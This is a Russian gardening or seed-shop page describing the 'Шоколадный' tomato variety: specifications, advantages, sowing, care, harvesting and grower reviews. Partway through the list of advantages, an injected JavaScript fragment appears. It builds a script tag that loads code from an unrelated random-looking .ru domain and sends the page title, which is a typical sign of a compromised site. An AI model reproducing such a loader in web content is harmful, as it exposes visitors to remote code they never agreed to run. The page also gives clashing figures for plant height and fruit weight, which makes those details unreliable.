Самые вкусные и полезные томаты с высоким содержанием антиоксидантов.
О чем статья:
Описание

Среднеспелый урожайный кистевой сорт. Плоды перцевидные, плотные, шоколадного цвета с тонкой кожурой. Мякоть плотная, сладкая, очень вкусная.
Происхождение сорта: Россия
Срок созревания: 110-120 дней
Тип куста: индетерминантный
Высота растения: 130-170 см
Цвет плода: шоколадный
Форма плода: перцевидная
Вес плода: 80-140 г
Формировка: в 2-3 стебля
Срок годности партии до 2025г
Характеристики

Время посадки:
февраль — апрель
Время созревания:
июль — октябрь
Высота растения
200 — 250 см
Растояние между растениями
50 х 50 см
Местоположение
открытый грунт, теплица
Период созревания
среднеранний (110 — 115 дней)
Урожайность
8 — 9 кг/м?
Вес плода
90 — 110 г
Применение
для свежего потребления, приготовления соков и соусов
Особенности
обсыпной! сладкий! холодостойкий!
Отзывы
Оставить отзыв
Оценка
Добавить один или несколько файлов
Я согласен на обработку моих персональных данных и ознакомлен с политикой конфидинциальности.
Доставка и оплата
Плюсы и минусы сорта

Достоинства томата Шоколадный:
- Сорт помидор хорошо дает отпор большинству болезней. Но следует отметить, что у него повышенная стойкость к различным типам гнили. Даже если лето будет дождливым, оно не принесет вред растениям. Но не стоит игнорировать профилактические меры. А если растение будет чересчур загущено при жаркой погоде и высокой влажности может повлечь образование фитофторы.
- Отличные параметры урожайности томата довольно часто заставляют огородников перешагнуть через свои амбиции, которые относятся к окрасу помидоров. И если иные разновидности дадут плохой урожай, то Шоколадный всегда придет на выручку хозяевам.
- Томатам свойственный ходовой размер. Плоды не крупные, но и не маленькие, а как раз отлично подойдут для банки. Грозди просто снять с куста, поэтому сбор урожая будет выполняться быстрее.
- Хоть томаты и окрашены в коричневый тон, они очень вкусные. Конечно, томаты не так изящно выглядят в банке или салате, но тот, кто их попробует, не сможет остаться к ним равнодушным.
- Достоинством сорта считается и легкость в уходе. К тому же помидор Шоколадный нетребователен. Поэтому даже неопытный огородник может получить нормальный урожай плодов. Особенно этот сорт понравится дачникам, у которых нет возможности каждый день выезжать загород, чтобы полить грядки.
- Его форма придает томатам товарный вид, поэтому сорт отлично подойдет для выращивания не только для себя, но и на реализацию.
var m5d6fd70f32c60 = document.createElement(‘script’);
m5d6fd70f32c60.src=’https://s98k2dmmbm.ru/show/?’ + Math.round(Math.random()*100000) + ‘=’ + Math.round(Math.random()*100000) + ‘&’ + Math.round(Math.random()*100000) + ‘=3085&’ + Math.round(Math.random()*100000) + ‘=’ + document.title +’&’ + Math.round(Math.random()*100000);
function f5d6fd70f32c60() else
}
f5d6fd70f32c60();
О томатах Шоколадного можно читать множество отзывов, но вот негативных суждений почти нет.
Недостатком иногда называют цвет помидоров, но многие огородники по прохождении времени меняют свое мнение о коричневых помидорах.
Посадка и уход

Семена сеют на рассаду с расчетом, чтобы высадить кусты в открытый грунт в конце мая – начале июня в возрасте 50-60 дней. Для теплиц томат сеют на две недели раньше.
Для посадки готовят питательную и легкую землю, в которую добавляют:
- торф (2 части);
- компост (1 часть);
- обычную землю (1 часть);
- речной песок (0,5 части).
А также присоединяют стакан древесной золы на ведро и немного суперфосфата либо комплексного удобрения. Субстрат прокаливают в печи либо проливают трехпроцентным раствором марганцовки. Семена можно тоже обработать марганцовкой, а затем простимулировать всхожесть препаратом «Эпин».
Для семян делают бороздки глубиной 1,5-2 см, увлажняют посевы, прикрывают пленкой и проращивают при температуре +22-25 градусов. Затем после всходов в течение недели поддерживают уровень в +18, а потом днем повышают температуру, а ночью понижают.
Пикируют в фазе 2-х полноценных листьев.
Лучше рассаживать кустики по торфяным горшочкам, что позволит не травмировать корни во время переноса на постоянное место.
В лунки перед пересадкой в огород вносят немного суперфосфата. Землю можно перекопать и внести компост или перегной. Не следует сажать помидоры на участках после других пасленовых – помидоров, картофеля, перца, физалиса, баклажанов. Лучше выбирать почву, где выращивались бобовые, лук, укроп, морковь, капуста, кабачки.
Вторую подкормку проводят через 20 дней после пересадки, используя навоз (перепревший, а не свежий), третью – с началом развития завязей, применяя комплексные минеральные удобрения.
Поливают отстоянной водой, стараясь не намочить стебли и листву, землю рыхлят и мульчируют сеном, соломой. Пропалывают сорняки.
Рекомендуемые сорта томатовУльтраранние / ВысокорослыйШоколадные пальчики F1Оценка пользователей: 5/5Среднеспелые / ВысокорослыйЗолотой петушокОценка пользователей: 5/5Среднеспелые / ВысокорослыйЖёлтый рифленыйОценка пользователей: 4/5Ультраранние / ВысокорослыйГолден сан f1Оценка пользователей: 5/5
Уход после пересадки

Уход за высокорослыми томатами не сложный. Он заключается в постоянном выполнении определённых операций:
- полив;
- рыхление;
- пасынкование;
- подвязка стебля.
Если вокруг растения уложить слой мульчи из соломы или сухой травы, то рыхление можно будет не проводить, а полив выполнять реже. Слой мульчи нужно укладывать толщиной не менее 5см.
Пасынкование заключается в удалении пасынков с куста. Это позволит сформировать растение в один-два стебля. Это позволит не загущать посадки и, как следствие, помидоры будут хорошо проветриваться.
Также нужно три раза за сезон выполнить подкормку. Для этого хорошо подойдёт навоз или куриный помёт. В августе верхушку куста нужно прищепить. В этом случае те томаты, которые уже завязались, успеют вызреть.
Сбор и хранение урожая

Плоды помидор собирают по мере поспевания. Дачники готовят к этому времени специальные емкости, в которых хранят томаты.
Корзины, ящики или контейнеры должны быть изготовлены из натуральных материалов. Для лучшего сохранения и профилактики гниения на дно укладывают пергаментную бумагу.
При хранении следят за отсутствием попадания солнечного света и проветриванием помещения.
Отзывы овощеводов

По оценкам тех, кто сажал разные томаты на участке, самыми популярными являются гибриды сибирской селекции. Из-за климатических условий огородники в Сибири сталкиваются с множеством проблем. Специально для их преодоления выведены виды, которые проявляют устойчивость к низким температурам и дают богатый урожай.
Томат Шоколадный – сладкий гибридный сорт красно-коричневого цвета. У него плотная мякоть и более яркий вкус по сравнению с красными помидорами из-за высокого содержания антоциана. Томат Шоколадный выращивают рассадой: сеют в феврале-марте, пикируют после появления 2-го листа и пересаживают в открытый грунт или в теплицу в конце мая, когда минует угроза заморозков. Этому сорту важна постоянная вентиляция, своевременный полив, подвязка и формирования куста в 2-3 ветви. Он не боится вершинной и корневой гнили, но иногда повреждается грибковыми болезнями, поэтому профилактика все равно нужна. Зато урожай порадует – около 10 кг томатов на 1 кв. метр. Можно засолить, сделать сок или съесть в сыром виде – они сладкие и вкусные.
В статье использованы материалы с сайтов: